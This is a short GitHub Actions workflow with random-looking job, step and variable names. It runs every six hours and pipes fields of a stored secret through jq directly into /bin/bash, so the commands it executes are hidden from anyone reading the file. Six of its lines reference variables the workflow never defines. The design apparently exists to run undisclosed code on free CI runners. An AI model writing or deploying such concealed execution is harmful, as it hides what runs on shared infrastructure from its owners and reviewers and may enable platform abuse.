name: xiongyonghong6473

on:
  workflow_dispatch:
  schedule:
    - cron: '50 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiongyonghong6473
        env:
          tkud307: ${{ secrets.tkud307 }}
        run: |
          echo $tkud307 | jq -r .jn1 | /bin/bash
          echo $woe6739 | jq -r .c1 | /bin/bash
          echo $q816 | jq -r .dqip9661 | /bin/bash
          echo $w146 | jq -r .ge01683 | /bin/bash
          echo $xhtw98 | jq -r .rmwu180 | /bin/bash
          echo $fp3 | jq -r .qtixk870 | /bin/bash
          echo $mx3 | jq -r .jsi52 | /bin/bash

